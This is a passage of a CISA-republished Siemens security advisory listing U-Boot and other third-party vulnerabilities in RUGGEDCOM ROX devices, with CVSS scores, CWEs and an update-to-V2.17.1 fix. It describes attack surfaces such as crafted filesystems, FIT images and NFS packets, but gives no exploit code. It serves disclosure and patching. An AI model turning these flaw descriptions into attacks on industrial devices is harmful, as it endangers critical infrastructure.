https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-081142 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-14 2 Initial CISA Republication of Siemens ProductCERT SSA-081142 advisory Legal Notice and Terms of Use

View CSAF Summary Ruggedcom Rox before v2.17.1 contain multiple third-party vulnerabilities. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens Ruggedcom Rox are affected: RUGGEDCOM ROX MX5000 vers:intdot/<2.17.1 (CVE-2019-13103, CVE-2019-13104, CVE-2019-13106, CVE-2019-14192, CVE-2019-14193, CVE-2019-14194, CVE-2019-14195, CVE-2019-14196, CVE-2019-14197, CVE-2019-14198, CVE-2019-14199, CVE-2019-14200, CVE-2019-14201, CVE-2019-14202, CVE-2019-14203, CVE-2019-14204, CVE-2020-10648, CVE-2022-2347, CVE-2022-30552, CVE-2022-30790, CVE-2022-34835, CVE-2023-3019, CVE-2023-27043, CVE-2024-3447, CVE-2024-22365, CVE-2024-57256, CVE-2024-57258, CVE-2025-0395, CVE-2025-3576, CVE-2025-6020, CVE-2025-7425, CVE-2025-9714, CVE-2025-46836, CVE-2025-49794, CVE-2025-49796) RUGGEDCOM ROX MX5000RE vers:intdot/<2.17.1 (CVE-2019-13103, CVE-2019-13104, CVE-2019-13106, CVE-2019-14192, CVE-2019-14193, CVE-2019-14194, CVE-2019-14195, CVE-2019-14196, CVE-2019-14197, CVE-2019-14198, CVE-2019-14199, CVE-2019-14200, CVE-2019-14201, CVE-2019-14202, CVE-2019-14203, CVE-2019-14204, CVE-2020-10648, CVE-2022-2347, CVE-2022-30552, CVE-2022-30790, CVE-2022-34835, CVE-2023-3019, CVE-2023-27043, CVE-2024-3447, CVE-2024-22365, CVE-2024-57256, CVE-2024-57258, CVE-2025-0395, CVE-2025-3576, CVE-2025-6020, CVE-2025-7425, CVE-2025-9714, CVE-2025-46836, CVE-2025-49794, CVE-2025-49796) RUGGEDCOM ROX RX1400 vers:intdot/<2.17.1 (CVE-2019-13103, CVE-2019-13104, CVE-2019-13106, CVE-2019-14192, CVE-2019-14193, CVE-2019-14194, CVE-2019-14195, CVE-2019-14196, CVE-2019-14197, CVE-2019-14198, CVE-2019-14199, CVE-2019-14200, CVE-2019-14201, CVE-2019-14202, CVE-2019-14203, CVE-2019-14204, CVE-2020-10648, CVE-2022-2347, CVE-2022-30552, CVE-2022-30790, CVE-2022-34835, CVE-2023-3019, CVE-2023-27043, CVE-2024-3447, CVE-2024-22365, CVE-2024-57256, CVE-2024-57258, CVE-2025-0395, CVE-2025-3576, CVE-2025-6020, CVE-2025-7425, CVE-2025-9714, CVE-2025-46836, CVE-2025-49794, CVE-2025-49796) RUGGEDCOM ROX RX1500 vers:intdot/<2.17.1 (CVE-2019-13103, CVE-2019-13104, CVE-2019-13106, CVE-2019-14192, CVE-2019-14193, CVE-2019-14194, CVE-2019-14195, CVE-2019-14196, CVE-2019-14197, CVE-2019-14198, CVE-2019-14199, CVE-2019-14200, CVE-2019-14201, CVE-2019-14202, CVE-2019-14203, CVE-2019-14204, CVE-2020-10648, CVE-2022-2347, CVE-2022-30552, CVE-2022-30790, CVE-2022-34835, CVE-2023-3019, CVE-2023-27043, CVE-2024-3447, CVE-2024-22365, CVE-2024-57256, CVE-2024-57258, CVE-2025-0395, CVE-2025-3576, CVE-2025-6020, CVE-2025-7425, CVE-2025-9714, CVE-2025-46836, CVE-2025-49794, CVE-2025-49796) RUGGEDCOM ROX RX1501 vers:intdot/<2.17.1 (CVE-2019-13103, CVE-2019-13104, CVE-2019-13106, CVE-2019-14192, CVE-2019-14193, CVE-2019-14194, CVE-2019-14195, CVE-2019-14196, CVE-2019-14197, CVE-2019-14198, CVE-2019-14199, CVE-2019-14200, CVE-2019-14201, CVE-2019-14202, CVE-2019-14203, CVE-2019-14204, CVE-2020-10648, CVE-2022-2347, CVE-2022-30552, CVE-2022-30790, CVE-2022-34835, CVE-2023-3019, CVE-2023-27043, CVE-2024-3447, CVE-2024-22365, CVE-2024-57256, CVE-2024-57258, CVE-2025-0395, CVE-2025-3576, CVE-2025-6020, CVE-2025-7425, CVE-2025-9714, CVE-2025-46836, CVE-2025-49794, CVE-2025-49796) RUGGEDCOM ROX RX1510 vers:intdot/<2.17.1 (CVE-2019-13103, CVE-2019-13104, CVE-2019-13106, CVE-2019-14192, CVE-2019-14193, CVE-2019-14194, CVE-2019-14195, CVE-2019-14196, CVE-2019-14197, CVE-2019-14198, CVE-2019-14199, CVE-2019-14200, CVE-2019-14201, CVE-2019-14202, CVE-2019-14203, CVE-2019-14204, CVE-2020-10648, CVE-2022-2347, CVE-2022-30552, CVE-2022-30790, CVE-2022-34835, CVE-2023-3019, CVE-2023-27043, CVE-2024-3447, CVE-2024-22365, CVE-2024-57256, CVE-2024-57258, CVE-2025-0395, CVE-2025-3576, CVE-2025-6020, CVE-2025-7425, CVE-2025-9714, CVE-2025-46836, CVE-2025-49794, CVE-2025-49796) RUGGEDCOM ROX RX1511 vers:intdot/<2.17.1 (CVE-2019-13103, CVE-2019-13104, CVE-2019-13106, CVE-2019-14192, CVE-2019-14193, CVE-2019-14194, CVE-2019-14195, CVE-2019-14196, CVE-2019-14197, CVE-2019-14198, CVE-2019-14199, CVE-2019-14200, CVE-2019-14201, CVE-2019-14202, CVE-2019-14203, CVE-2019-14204, CVE-2020-10648, CVE-2022-2347, CVE-2022-30552, CVE-2022-30790, CVE-2022-34835, CVE-2023-3019, CVE-2023-27043, CVE-2024-3447, CVE-2024-22365, CVE-2024-57256, CVE-2024-57258, CVE-2025-0395, CVE-2025-3576, CVE-2025-6020, CVE-2025-7425, CVE-2025-9714, CVE-2025-46836, CVE-2025-49794, CVE-2025-49796) RUGGEDCOM ROX RX1512 vers:intdot/<2.17.1 (CVE-2019-13103, CVE-2019-13104, CVE-2019-13106, CVE-2019-14192, CVE-2019-14193, CVE-2019-14194, CVE-2019-14195, CVE-2019-14196, CVE-2019-14197, CVE-2019-14198, CVE-2019-14199, CVE-2019-14200, CVE-2019-14201, CVE-2019-14202, CVE-2019-14203, CVE-2019-14204, CVE-2020-10648, CVE-2022-2347, CVE-2022-30552, CVE-2022-30790, CVE-2022-34835, CVE-2023-3019, CVE-2023-27043, CVE-2024-3447, CVE-2024-22365, CVE-2024-57256, CVE-2024-57258, CVE-2025-0395, CVE-2025-3576, CVE-2025-6020, CVE-2025-7425, CVE-2025-9714, CVE-2025-46836, CVE-2025-49794, CVE-2025-49796) RUGGEDCOM ROX RX1524 vers:intdot/<2.17.1 (CVE-2019-13103, CVE-2019-13104, CVE-2019-13106, CVE-2019-14192, CVE-2019-14193, CVE-2019-14194, CVE-2019-14195, CVE-2019-14196, CVE-2019-14197, CVE-2019-14198, CVE-2019-14199, CVE-2019-14200, CVE-2019-14201, CVE-2019-14202, CVE-2019-14203, CVE-2019-14204, CVE-2020-10648, CVE-2022-2347, CVE-2022-30552, CVE-2022-30790, CVE-2022-34835, CVE-2023-3019, CVE-2023-27043, CVE-2024-3447, CVE-2024-22365, CVE-2024-57256, CVE-2024-57258, CVE-2025-0395, CVE-2025-3576, CVE-2025-6020, CVE-2025-7425, CVE-2025-9714, CVE-2025-46836, CVE-2025-49794, CVE-2025-49796) RUGGEDCOM ROX RX1536 vers:intdot/<2.17.1 (CVE-2019-13103, CVE-2019-13104, CVE-2019-13106, CVE-2019-14192, CVE-2019-14193, CVE-2019-14194, CVE-2019-14195, CVE-2019-14196, CVE-2019-14197, CVE-2019-14198, CVE-2019-14199, CVE-2019-14200, CVE-2019-14201, CVE-2019-14202, CVE-2019-14203, CVE-2019-14204, CVE-2020-10648, CVE-2022-2347, CVE-2022-30552, CVE-2022-30790, CVE-2022-34835, CVE-2023-3019, CVE-2023-27043, CVE-2024-3447, CVE-2024-22365, CVE-2024-57256, CVE-2024-57258, CVE-2025-0395, CVE-2025-3576, CVE-2025-6020, CVE-2025-7425, CVE-2025-9714, CVE-2025-46836, CVE-2025-49794, CVE-2025-49796) RUGGEDCOM ROX RX5000 vers:intdot/<2.17.1 (CVE-2019-13103, CVE-2019-13104, CVE-2019-13106, CVE-2019-14192, CVE-2019-14193, CVE-2019-14194, CVE-2019-14195, CVE-2019-14196, CVE-2019-14197, CVE-2019-14198, CVE-2019-14199, CVE-2019-14200, CVE-2019-14201, CVE-2019-14202, CVE-2019-14203, CVE-2019-14204, CVE-2020-10648, CVE-2022-2347, CVE-2022-30552, CVE-2022-30790, CVE-2022-34835, CVE-2023-3019, CVE-2023-27043, CVE-2024-3447, CVE-2024-22365, CVE-2024-57256, CVE-2024-57258, CVE-2025-0395, CVE-2025-3576, CVE-2025-6020, CVE-2025-7425, CVE-2025-9714, CVE-2025-46836, CVE-2025-49794, CVE-2025-49796) CVSS Vendor Equipment Vulnerabilities v3 9.8 Siemens Siemens Ruggedcom Rox Uncontrolled Recursion, Integer Underflow (Wrap or Wraparound), Out-of-bounds Write, Out-of-bounds Read, Improper Input Validation, Heap-based Buffer Overflow, Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'), Use After Free, Improper Validation of Syntactic Correctness of Input, Improper Control of a Resource Through its Lifetime, Integer Overflow or Wraparound, Incorrect Calculation of Buffer Size, Use of Weak Hash, Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Stack-based Buffer Overflow, Expired Pointer Dereference Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2019-13103 A crafted self-referential DOS partition table will cause all Das U-Boot versions through 2019.07-rc4 to infinitely recurse, causing the stack to grow infinitely and eventually either crash or overwrite other data. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-674 Uncontrolled Recursion Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H CVE-2019-13104 In Das U-Boot versions 2016.11-rc1 through 2019.07-rc4, an underflow can cause memcpy() to overwrite a very large amount of data (including the whole stack) while reading a crafted ext4 filesystem. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-191 Integer Underflow (Wrap or Wraparound) Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2019-13106 Das U-Boot versions 2016.09 through 2019.07-rc4 can memset() too much data while reading a crafted ext4 filesystem, which results in a stack buffer overflow and likely code execution. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2019-14192 An issue was discovered in Das U-Boot through 2019.07. There is an unbounded memcpy when parsing a UDP packet due to a net_process_received_packet integer underflow during an nc_input_packet call. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-191 Integer Underflow (Wrap or Wraparound) Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2019-14193 An issue was discovered in Das U-Boot through 2019.07. There is an unbounded memcpy with an unvalidated length at nfs_readlink_reply, in the "if" block after calculating the new path length. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2019-14194 An issue was discovered in Das U-Boot through 2019.07. There is an unbounded memcpy with a failed length check at nfs_read_reply when calling store_block in the NFSv2 case. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2019-14195 An issue was discovered in Das U-Boot through 2019.07. There is an unbounded memcpy with unvalidated length at nfs_readlink_reply in the "else" block after calculating the new path length. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2019-14196 An issue was discovered in Das U-Boot through 2019.07. There is an unbounded memcpy with a failed length check at nfs_lookup_reply. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2019-14197 An issue was discovered in Das U-Boot through 2019.07. There is a read of out-of-bounds data at nfs_read_reply. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.0 9.1 CRITICAL CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H CVE-2019-14198 An issue was discovered in Das U-Boot through 2019.07. There is an unbounded memcpy with a failed length check at nfs_read_reply when calling store_block in the NFSv3 case. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2019-14199 An issue was discovered in Das U-Boot through 2019.07. There is an unbounded memcpy when parsing a UDP packet due to a net_process_received_packet integer underflow during an *udp_packet_handler call. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-191 Integer Underflow (Wrap or Wraparound) Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2019-14200 An issue was discovered in Das U-Boot through 2019.07. There is a stack-based buffer overflow in this nfs_handler reply helper function: rpc_lookup_reply. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2019-14201 An issue was discovered in Das U-Boot through 2019.07. There is a stack-based buffer overflow in this nfs_handler reply helper function: nfs_lookup_reply. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2019-14202 An issue was discovered in Das U-Boot through 2019.07. There is a stack-based buffer overflow in this nfs_handler reply helper function: nfs_readlink_reply. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2019-14203 An issue was discovered in Das U-Boot through 2019.07. There is a stack-based buffer overflow in this nfs_handler reply helper function: nfs_mount_reply. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2019-14204 An issue was discovered in Das U-Boot through 2019.07. There is a stack-based buffer overflow in this nfs_handler reply helper function: nfs_umountall_reply. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2020-10648 Das U-Boot through 2020.01 allows attackers to bypass verified boot restrictions and subsequently boot arbitrary images by providing a crafted FIT image to a system configured to boot the default configuration. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2022-2347 There exists an unchecked length field in UBoot. The U-Boot DFU implementation does not bound the length field in USB DFU download setup packets, and it does not verify that the transfer direction corresponds to the specified command. Consequently, if a physical attacker crafts a USB DFU download setup packet with a `wLength` greater than 4096 bytes, they can write beyond the heap-allocated request buffer. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-122 Heap-based Buffer Overflow Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.7 HIGH CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H CVE-2022-30552 Das U-Boot 2022.01 has a Buffer Overflow. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version https://support.industry.siemens.com/cs/ww/en/view/110002017/ Relevant CWE: CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2022-30790 Das U-Boot 2022.01 has a Buffer Overflow, a different issue than CVE-2022-30552. View CVE Details Affected Products Siemens Ruggedcom Rox Vendor: Siemens Product Version: RUGGEDCOM ROX MX5000, RUGGEDCOM ROX MX5000RE, RUGGEDCOM ROX RX1400, RUGGEDCOM ROX RX1500, RUGGEDCOM ROX RX1501, RUGGEDCOM ROX RX1510, RUGGEDCOM ROX RX1511, RUGGEDCOM ROX RX1512, RUGGEDCOM ROX RX1524, RUGGEDCOM ROX RX1536, RUGGEDCOM ROX RX5000 Product Status: known_affected Remediations Vendor fix Update to V2.17.1 or later version 